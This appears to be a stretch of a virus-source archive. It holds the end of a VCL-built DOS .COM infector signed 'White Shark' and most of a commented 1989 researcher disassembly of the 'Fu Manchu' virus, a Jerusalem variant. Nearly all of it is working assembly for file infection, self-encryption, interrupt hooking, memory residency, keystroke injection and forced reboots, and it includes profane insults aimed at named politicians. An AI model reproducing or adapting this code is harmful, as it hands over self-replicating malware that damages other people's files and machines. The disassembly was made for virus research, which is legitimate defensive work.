check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
db 032h,050h,0FFh,0D5h,088h
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 0DCh,02Bh,0D7h,0CEh,09Eh
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "Fuckin Shit Virus"
db "By White Shark"
db "Mess with the White Shark and"
db "you'll be eaten alive!"
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main

944
MSDOS/Virus.MSDOS.Unknown.fumanchu.asm Normal file
View File

@ -0,0 +1,944 @@
page 65,132
title The 'Fu Manchu' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Fu Manchu' Virus º
; º Disassembled by Joe Hirst, June 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus occurs attached to the beginning of a COM file, or the end
; of an EXE file. A COM file also has the six-byte 'marker' attached
; to the end.
; This virus is a variation of the Jerusalem virus
; The disassembly has been tested by re-assembly using MASM 5.0.
RAM SEGMENT AT 0
; System data
ORG 3FCH
BW03FC DW ?
BB03FE DB ?
ORG 417H
BB0417 DB ? ; Key states
ORG 46CH
BB046C DB ? ; System clock - low byte
ORG 2CH
ENV_SG DW ? ; Segment address of environment
RAM ENDS
RAM40 SEGMENT at 400H
ORG 1AH
BW041A DW ? ; Key token in pointer
BW041C DW ? ; Key token out pointer
ORG 80H
BW0480 DW ? ; Key token buffer start pointer
BW0482 DW ? ; Key token buffer end pointer
RAM40 ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,ES:RAM
; Entry point when attached to a COM file
START: JMP BP0010
DB 'sAX'
VR_SIG DB 'rEMHOr'
VIR_RT EQU THIS DWORD
V_RTOF DW 100H
V_RTSG DW 323FH
INT_08 EQU THIS DWORD
I08OFF DW 0106H ; Int 8 offset
I08SEG DW 0E95H ; Int 8 segment
INT_09 EQU THIS DWORD
I09OFF DW 02E9H ; Int 9 offset
I09SEG DW 0DC6H ; Int 9 segment
INT_16 EQU THIS DWORD
I16OFF DW 0 ; Int 16H offset
I16SEG DW 0 ; Int 16H segment
INT_21 EQU THIS DWORD
I21OFF DW 138DH ; Int 21H offset
I21SEG DW 029BH ; Int 21H segment
INT_24 EQU THIS DWORD
I24OFF DW 04EBH ; Int 24H offset
I24SEG DW 3228H ; Int 24H segment
BEGIN DW 0 ; Initial value for AX
F_SIZE DW 49H ; Total file size
TCOUNT1 DW 0 ; Timer count (low)
TCOUNT2 DW 0 ; Timer count (high)
ST_ES1 DW 3195H ; Original ES
SET_PA DW 00A2H
; Program parameter block
PPB_01 DW 0 ; Environment address
PPB_02 DW 0080H ; Command line offset
PPB_03 DW 3195H ; Command line segment
PPB_04 DW 005CH ; FCB1 offset
PPB_05 DW 3195H ; FCB1 segment
PPB_06 DW 006CH ; FCB2 offset
PPB_07 DW 3195H ; FCB2 segment
PRG_SP DW 0 ; Initial stack pointer store
PRG_SS DW 31A5H ; Initial stack segment store
PROGRM EQU THIS DWORD
PRGOFF DW 0 ; Initial code offset store
PRGSEG DW 31A5H ; Initial code segment store
SS_ST1 DW 0 ; Store for system area data (1)
SS_ST2 DB 86H ; Store for system area data (2)
; .EXE header store
EXEHED DB 4DH, 5AH ; 00 .EXE header ident
EXHD01 DW 0070H ; 02 Bytes in last page
EXHD02 DW 0006H ; 04 Size of file in pages
EXHD03 DW 0000H ; 06 Number of relocation entries
EXHD04 DW 0020H ; 08 Size of header in paragraphs
EXHD05 DW 0000H ; 0A Minimum extra storage required
EXHD06 DW -1 ; 0C Maximum extra storage required
EXHD07 DW 0005H ; 0E Initial stack segment
EXHD08 DW ENDADR ; 10 Initial stack pointer
EXHD09 DW 1988H ; 12 Negative checksum
EXHD10 DW 0223H ; 14 Initial code offset
EXHD11 DW 0005H ; 16 Initial code segment
DW 01EH ; 18 Relative offset of reloc table
DW 0 ; 1A Overlay number
SIGBUF DB 069H, 06FH, 06EH, 00DH, 00AH, 024H
F_HAND DW 5 ; File handle
F_ATTS DW 0020H ; File attributes
F_DATE DW 1273H ; File date
F_TIME DW 4972H ; File time
F_SIZ1 DW 0250H ; Low-order file size
F_SIZ2 DW 0 ; High-order file size
F_PATH EQU THIS DWORD
FPTHOF DW 3D5BH ; Program pathname offset
FPTHSG DW 9B70H ; Program pathname segment
COM_CM DB 'COMMAND.COM'
EXE_SW DB 0 ; EXE switch - 0 = .COM extension
MEM_SW DW 1 ; Memory allocated switch
OUT_SW DB 0 ; Output in progress switch
BYTSEC DW 0200H ; Bytes per sector
PARAGR DW 0010H ; Size of a paragraph
; The next fields are encrypted, and translate to:
;STRNG1 DB 'fu manchu virus 3/10/88 - latest in the new fun line!', 0
;STRNG2 DB 'thatcher is a cunt ', 0
;STRNG3 DB 'reagan is an arsehole ', 0
;STRNG4 DB 'botha is a bastard ', 0
;STRNG5 DB 'waldheim is a Nazi ', 0
;STRNG6 DB 'fuck', 8, 8, 8, 8, 0
;STRNG7 DB 'cunt', 8, 8, 8, 8, 0
;STRNG8 DB 'The world will hear from me again! ', 0
STRNG1 DB 0C9H, 0DAH, 08FH, 0C2H, 0CEH, 0C1H, 0CCH, 0C7H
DB 0DAH, 08FH, 0D9H, 0C6H, 0DDH, 0DAH, 0DCH, 08FH
DB 09CH, 080H, 09EH, 09FH, 080H, 097H, 097H, 08FH
DB 082H, 08FH, 0C3H, 0CEH, 0DBH, 0CAH, 0DCH, 0DBH
DB 08FH, 0C6H, 0C1H, 08FH, 0DBH, 0C7H, 0CAH, 08FH
DB 0C1H, 0CAH, 0D8H, 08FH, 0C9H, 0DAH, 0C1H, 08FH
DB 0C3H, 0C6H, 0C1H, 0CAH, 08EH, 0
STRNG2 DB 0DBH, 0C7H, 0CEH, 0DBH, 0CCH, 0C7H, 0CAH, 0DDH
DB 08FH, 0C6H, 0DCH, 08FH, 0CEH, 08FH, 0CCH, 0DAH
DB 0C1H, 0DBH, 08FH, 0
STRNG3 DB 0DDH, 0CAH, 0CEH, 0C8H, 0CEH, 0C1H, 08FH, 0C6H
DB 0DCH, 08FH, 0CEH, 0C1H, 08FH, 0CEH, 0DDH, 0DCH
DB 0CAH, 0C7H, 0C0H, 0C3H, 0CAH, 08FH, 0
STRNG4 DB 0CDH, 0C0H, 0DBH, 0C7H, 0CEH, 08FH, 0C6H, 0DCH
DB 08FH, 0CEH, 08FH, 0CDH, 0CEH, 0DCH, 0DBH, 0CEH
DB 0DDH, 0CBH, 08FH, 0
STRNG5 DB 0D8H, 0CEH, 0C3H, 0CBH, 0C7H, 0CAH, 0C6H, 0C2H
DB 08FH, 0C6H, 0DCH, 08FH, 0CEH, 08FH, 0E1H, 0CEH
DB 0D5H, 0C6H, 08FH, 0
STRNG6 DB 0C9H, 0DAH, 0CCH, 0C4H, 0A7H, 0A7H, 0A7H, 0A7H, 0
STRNG7 DB 0CCH, 0DAH, 0C1H, 0DBH, 0A7H, 0A7H, 0A7H, 0A7H, 0
STRNG8 DB 0FBH, 0C7H, 0CAH, 08FH, 0D8H, 0C0H, 0DDH, 0C3H
DB 0CBH, 08FH, 0D8H, 0C6H, 0C3H, 0C3H, 08FH, 0C7H
DB 0CAH, 0CEH, 0DDH, 08FH, 0C9H, 0DDH, 0C0H, 0C2H
DB 08FH, 0C2H, 0CAH, 08FH, 0CEH, 0C8H, 0CEH, 0C6H
DB 0C1H, 08EH, 08FH, 08FH, 08FH, 0
; Each entry is:
; DB length to find
; DB length found
; DW pointer to string
TABLE DB 10, 0
DW STRNG1
DB 9, 0
DW STRNG2
DB 7, 0
DW STRNG3
DB 6, 0
DW STRNG4
DB 9, 0
DW STRNG5
DB 4, 0
DW STRNG6
DB 4, 0
DW STRNG7
DB 0
TABOUT DW 0 ; Table entry for output
; Key number table for fake input
KEYTAB DB 03H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 00 - 07
DB 0EH, 0FH, 1CH, 25H, 26H, 1CH, 31H, 18H ; 08 - 0F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 10 - 17
DB 2DH, 15H, 2CH, 01H, 2BH, 1BH, 07H, 0CH ; 18 - 1F
DB 39H, 02H, 28H, 04H, 05H, 06H, 08H, 28H ; 20 - 27
DB 0AH, 0BH, 09H, 0DH, 33H, 0CH, 34H, 35H ; 28 - 2F
DB 0BH, 02H, 03H, 04H, 05H, 06H, 07H, 08H ; 30 - 37
DB 09H, 0AH, 27H, 27H, 33H, 0DH, 34H, 35H ; 38 - 3F
DB 03H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 40 - 47
DB 23H, 17H, 24H, 25H, 26H, 32H, 31H, 18H ; 48 - 4F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 50 - 57
DB 2DH, 15H, 2CH, 1AH, 2BH, 1BH, 07H, 0CH ; 58 - 5F
DB 29H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 60 - 67
DB 23H, 17H, 24H, 25H, 26H, 32H, 31H, 18H ; 68 - 6F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 70 - 77
DB 2DH, 15H, 2CH, 1AH, 2BH, 1BH, 29H, 0EH ; 78 - 7F
; This section assumes a COM origin of 100H
BP0010: CLD
MOV AH,0E1H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E1H ; Test for unchanged
JNB BP0020 ; Branch if invalid reply
CMP AH,4 ; Test for standard "yes"
JB BP0020 ; Branch if non-standard
MOV AH,0DDH ; Replace program over virus
MOV DI,0100H ; Initial offset
MOV SI,OFFSET ENDADR ; Length of virus
ADD SI,DI ; Add initial offset
MOV CX,F_SIZE[DI] ; Get total filesize
INT 21H ; DOS service (Virus - 2)
; Virus not in system, or non-communicating variety
BP0020: MOV AX,CS ; Get current segment
ADD AX,10H ; Address past PSP
MOV PRG_SP,SP ; Save current value
MOV SS,AX ; \ Set up stack
MOV SP,OFFSET ENDADR+100H ; /
PUSH AX ; Segment for return
MOV AX,OFFSET BP0030 ; \ Offset for return
PUSH AX ; /
RETF ; "Return" to next instruction
; We now have an origin of zero
; Entry point when attached to an EXE file
BP0030: CLD
PUSH ES
MOV ST_ES1,ES ; Save original ES
MOV PPB_03,ES ; \
MOV PPB_05,ES ; ) Segments in PPB
MOV PPB_07,ES ; /
MOV AX,ES ; \ Segment relocation factor
ADD AX,10H ; /
ADD PRGSEG,AX ; Initial code segment store
ADD PRG_SS,AX ; Initial stack segment store
MOV AH,0E1H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E1H ; Test for unchanged
JNB BP0040 ; Branch if not
CMP AH,4 ; Test for standard "yes"
POP ES
MOV SS,PRG_SS ; Initial stack segment store
MOV SP,PRG_SP ; Initial stack pointer store
JMP PROGRM ; Start of actual program
; Virus is not already active
BP0040: XOR AX,AX ; \ Address page zero
MOV ES,AX ; /
MOV AX,BW03FC ; \ Save system area data (1)
MOV SS_ST1,AX ; /
MOV AL,BB03FE ; \ Save system area data (2)
MOV SS_ST2,AL ; /
MOV BW03FC,0A4F3H ; Store REPZ MOVSB
MOV BB03FE,0CBH ; Store RETF
POP AX ; \
ADD AX,10H ; ) Address past PSP
MOV ES,AX ; /
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV CX,OFFSET ENDADR ; Length of virus
XOR SI,SI ; \ Clear registers
MOV DI,SI ; /
PUSH ES ; \
MOV AX,OFFSET BP0050 ; ) Set up return address
PUSH AX ; /
DB 0EAH ; \ Far jump to move instruction
DW BW03FC, 0 ; /
BP0050: MOV AX,CS ; \
MOV SS,AX ; ) Set up internal stack
MOV SP,OFFSET ENDADR+100H ; /
XOR AX,AX ; \ Address page zero
MOV DS,AX ; /
ASSUME DS:RAM,ES:NOTHING
MOV AX,SS_ST1 ; \ Restore system area data (1)
MOV BW03FC,AX ; /
MOV AL,SS_ST2 ; \ Restore system area data (2)
MOV BB03FE,AL ; /
MOV BX,SP ; Get stack pointer
MOV CL,4 ; \ Convert to paragraphs
SHR BX,CL ; /
ADD BX,10H ; Allow for PSP
MOV SET_PA,BX ; Save number of paragraphs
MOV ES,ST_ES1 ; Get original ES
MOV AH,4AH ; Set block
INT 21H ; DOS service (Set block)
MOV AX,3521H ; Get interrupt 21H
INT 21H ; DOS service (Get int)
MOV I21OFF,BX ; Save interrupt 21H offset
MOV I21SEG,ES ; Save interrupt 21H segment
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV DX,OFFSET BP0170 ; Interrupt 21H routine
MOV AX,2521H ; Set interrupt 21H
INT 21H ; DOS service (Set int)
MOV ES,ST_ES1 ; Get original ES
ASSUME ES:RAM
MOV ES,ES:ENV_SG ; Get environment segment
XOR DI,DI ; Start of environment
MOV CX,7FFFH ; Allow for 32K environment
XOR AL,AL ; Search for zero
BP0060: REPNZ SCASB ; Find zero
CMP ES:[DI],AL ; Is following character zero
LOOPNZ BP0060 ; Search again if not
MOV DX,DI ; Save pointer
ADD DX,3 ; Address pathname
MOV AX,4B00H ; Load and execute program
PUSH ES ; \ Set DS to ES
POP DS ; /
PUSH CS ; \ Set ES to CS
POP ES ; /
ASSUME DS:RAM,ES:NOTHING
MOV BX,OFFSET PPB_01 ; PPB (for load and execute)
PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
; Install interrupt 9 routine
MOV AX,3509H ; Get interrupt 9
INT 21H ; DOS service (Get int)
MOV I09OFF,BX ; Save interrupt 9 offset
MOV I09SEG,ES ; Save interrupt 9 segment
MOV AX,2509H ; Set interrupt 9
MOV DX,OFFSET BP0150 ; Interrupt 9 routine
INT 21H ; DOS service (Set int)
MOV AH,2AH ; Get date
INT 21H ; DOS service (Get date)
CMP CX,07C5H ; Year = 1989
JL BP0070 ; Branch if before
CMP DH,8 ; Month = August
JL BP0070 ; Branch if before
; Install interrupt 16H routine
MOV OUT_SW,0 ; Set off output switch
MOV AX,3516H ; Get interrupt 16H
INT 21H ; DOS service (Get int)
MOV I16OFF,BX ; Save interrupt 16H offset
MOV I16SEG,ES ; Save interrupt 16H segment
MOV AX,2516H ; Set interrupt 16H
MOV DX,OFFSET BP0540 ; Interrupt 16H routine
INT 21H ; DOS service (Set int)
BP0070: MOV BL,BB046C ; Get low byte of system clock
MOV BH,BL ; Copy
AND BX,0F00FH ; Isolate nibbles
CMP BL,0 ; Is low nibble of clock zero?
JNE BP0080 ; Branch if not
MOV CL,4 ; Bits to move
SHR BH,CL ; Move top nibble to bottom
CMP BH,0 ; Is second nibble of clock zero?
JE BP0080 ; Branch if yes
XOR AX,AX ; Clear register
MOV TCOUNT1,AX ; Set timer count (low)
MOV AL,BH ; Get second nibble of system clock
MOV TCOUNT2,AX ; Set timer count (high)
; Install interrupt 8 routine
MOV AX,3508H ; Get interrupt 8
INT 21H ; DOS service (Get int)
MOV I08OFF,BX ; Save interrupt 8 offset
MOV I08SEG,ES ; Save interrupt 8 segment
MOV AX,2508H ; Set interrupt 8
MOV DX,OFFSET BP0100 ; Interrupt 8 routine
INT 21H ; DOS service (Set int)
BP0080: POP DX
POP CX
POP BX
POP AX
POP ES
POP DS
ASSUME DS:NOTHING
PUSHF ; Fake an interrupt
CALL INT_21 ; Interrupt 21H (Load and execute)
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
MOV AH,4DH ; Get return code of child process
INT 21H ; DOS service (Get return code)
MOV AH,31H ; Keep process
MOV DX,OFFSET ENDADR ; Length of program
MOV CL,4 ; \ Convert to paragraphs
SHR DX,CL ; /
ADD DX,10H ; Add length of PSP
INT 21H ; DOS service (Keep process)
; Interrupt 24H
BP0090: XOR AL,AL ; Ignore the error
IRET
; Interrupt 8
BP0100: SUB TCOUNT1,1 ; \ Subtract from timer count
SBB TCOUNT2,0 ; /
JNZ BP0140 ; Branch if not zero
CMP TCOUNT1,0 ; Is low count zero?
JNZ BP0140 ; Branch if not
BP0110: PUSH CS ; \ Set DS to CS
POP DS ; /
MOV AX,3 ; Mode three
INT 10H ; VDU I/O
MOV AH,2 ; Move cursor
MOV BH,0 ; Page zero
MOV DX,0A14H ; Row ten column twenty
INT 10H ; VDU I/O
MOV SI,OFFSET STRNG8 ; Address message
BP0120: LOOP BP0120 ; Delay between characters
LODSB ; Get a character
CMP AL,0 ; Is that the end?
JE BP0130 ; Branch if yes
XOR AL,0AFH ; Decrypt character
MOV AH,14 ; Write in TTY mode
INT 10H ; VDU I/O
JMP BP0120 ; Next character
BP0130: DB 0EAH ; Far jump to BIOS initialisation
DW 0FFF0H, 0F000H
BP0140: JMP INT_08 ; Interrupt 8
; Interrupt 9
ASSUME DS:RAM
BP0150: PUSH AX
PUSH BX
PUSH DS
XOR AX,AX ; \ Address zero
MOV DS,AX ; /
IN AL,60H ; Get keyboard token
MOV BL,BB0417 ; Get key states
TEST BL,8 ; Alt key depressed?
JZ BP0160 ; Branch if not
TEST BL,4 ; Ctrl key depressed?
JZ BP0160 ; Branch if not
CMP AL,53H ; Del character token?
JNE BP0160 ; Branch if not
AND BL,0F3H ; Set off Alt & Ctrl states
MOV BB0417,BL ; Replace key states
IN AL,61H ; Get Port B
MOV AH,AL ; Save value
OR AL,80H ; Set on keyboard reset bit
OUT 61H,AL ; Output port B
XCHG AL,AH ; Recover original Port B value
OUT 61H,AL ; Output port B
JMP BP0110 ; Message and reboot
BP0160: POP DS
POP BX
POP AX
JMP INT_09 ; Interrupt 9
; Interrupt 21H
BP0170: PUSHF
CMP AH,0E1H ; Virus "are you there" call
JNE BP0180 ; Branch if other call
MOV AX,0400H ; Standard "yes"
POPF
IRET
BP0180: CMP AH,0DDH ; Virus move and execute COM call
JE BP0200 ; Branch if yes
CMP AX,4B00H ; Is it load and execute
JNE BP0190 ; Branch if not
JMP BP0210 ; Process load and execute
BP0190: POPF
JMP INT_21 ; Interrupt 21H
; Move program down and execute (COM only) call
ASSUME DS:NOTHING
BP0200: POP AX
POP AX ; Retrieve return offset
MOV AX,100H ; Replace with start address
MOV V_RTOF,AX ; Store in return jump
POP AX ; Retrieve return segment
MOV V_RTSG,AX ; Store in return jump
REPZ MOVSB ; Restore program to beginning
POPF
MOV AX,BEGIN ; Start with zero register
JMP VIR_RT ; Start actual program
; Process load and execute program
BP0210: MOV F_HAND,-1 ; No file handle
MOV MEM_SW,0 ; Set off memory allocated switch
MOV FPTHOF,DX ; Save pathname offset
MOV FPTHSG,DS ; Save pathname segment
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CLD
MOV DI,DX ; Point to file pathname
XOR DL,DL ; Default drive
CMP BYTE PTR [DI+1],3AH ; Test second character for ':'
JNE BP0220 ; Branch if not
MOV DL,[DI] ; Get drive letter
AND DL,1FH ; Convert to number
BP0220: MOV AH,36H ; Get disk free space
INT 21H ; DOS service (Get disk free)
CMP AX,-1 ; Test for invalid drive
JNE BP0240 ; Branch if not
BP0230: JMP BP0530 ; Terminate
BP0240: MUL BX ; Calc number of free sectors
MUL CX ; Calc number of free bytes
OR DX,DX ; Test high word of result
JNZ BP0250 ; Branch if not zero
CMP AX,OFFSET ENDADR ; Length of virus
JB BP0230 ; Terminate if less
BP0250: MOV DX,FPTHOF ; Get pathname offset
PUSH DS ; \ Set ES to DS
POP ES ; /
XOR AL,AL ; Test character - zero
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
MOV SI,FPTHOF ; Get pathname offset
BP0260: MOV AL,[SI] ; Get pathname character
OR AL,AL ; Test for a character
JZ BP0280 ; Finish if none
CMP AL,61H ; Test for 'a'
JB BP0270 ; Branch if less
CMP AL,7AH ; Test for 'z'
JA BP0270 ; Branch if above
SUB BYTE PTR [SI],20H ; Convert to uppercase
BP0270: INC SI ; Address next character
JMP BP0260 ; Process next character
BP0280: MOV CX,0BH ; Load length 11
SUB SI,CX ; Address back by length
MOV DI,OFFSET COM_CM ; 'COMMAND.COM'
PUSH CS ; \ Set ES to CS
POP ES ; /
MOV CX,0BH ; Load length again
REPZ CMPSB ; Compare
JNE BP0290 ; Continue if not command.com
JMP BP0530 ; Terminate
BP0290: MOV AX,4300H ; Get file attributes
INT 21H ; DOS service (Get attributes)
JB BP0300 ; Follow chain of error branches
MOV F_ATTS,CX ; Save file attributes
BP0300: JB BP0320 ; Follow chain of error branches
XOR AL,AL ; Scan character - zero
MOV EXE_SW,AL ; Set EXE switch off
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV DI,DX ; Pointer to pathname
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
CMP BYTE PTR [DI-2],4DH ; Is last letter 'M'
JE BP0310 ; Branch if yes
CMP BYTE PTR [DI-2],6DH ; Is last letter 'm'
JE BP0310 ; Branch if yes
INC EXE_SW ; Set EXE switch on
BP0310: MOV AX,3D00H ; Open handle, read only
INT 21H ; DOS service (Open handle)
BP0320: JB BP0330 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV BX,AX ; File handle
CMP EXE_SW,0 ; Test EXE switch
JE BP0340 ; Branch if off
; Test EXE file for infection
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0330: JB BP0370 ; Follow chain of error branches
CMP EXHD09,1988H ; Negative checksum
JNE BP0360 ; Branch if not infected
JMP BP0350 ; Dont infect
ASSUME DS:NOTHING
BP0340: MOV AX,4202H ; Move file pointer
MOV CX,-1 ; \ End of file minus 6
MOV DX,-6 ; /
INT 21H ; DOS service (Move pointer)
JB BP0320 ; Follow chain of error branches
ADD AX,6 ; Total file size
MOV F_SIZE,AX ; Save total file size
MOV CX,6 ; Length to read
MOV DX,OFFSET SIGBUF ; Infection test buffer
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
MOV DI,DX ; Address test buffer
MOV SI,OFFSET VR_SIG ; Signature
REPZ CMPSB ; Compare signatures
JNE BP0360 ; Branch if not infected
BP0350: MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
JMP BP0530 ; Terminate
BP0360: MOV AX,3524H ; Get interrupt 24H
INT 21H ; DOS service (Get int)
MOV I24OFF,BX ; Save interrupt 24H offset
MOV I24SEG,ES ; Save interrupt 24H segment
MOV DX,OFFSET BP0090 ; Interrupt 24H routine
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
LDS DX,F_PATH ; Address program pathname
XOR CX,CX ; No attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
ASSUME DS:NOTHING
BP0370: JB BP0380 ; Follow chain of error branches
MOV BX,F_HAND ; Get file handle
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
MOV F_HAND,-1 ; No file handle
MOV AX,3D02H ; Open handle read/write
INT 21H ; DOS service (Open handle)
JB BP0380 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV BX,F_HAND ; Get file handle
MOV AX,5700H ; Get file date and time
INT 21H ; DOS service (Get file date)
MOV F_DATE,DX ; Save file date
MOV F_TIME,CX ; Save file time
MOV AX,4200H ; Move file pointer
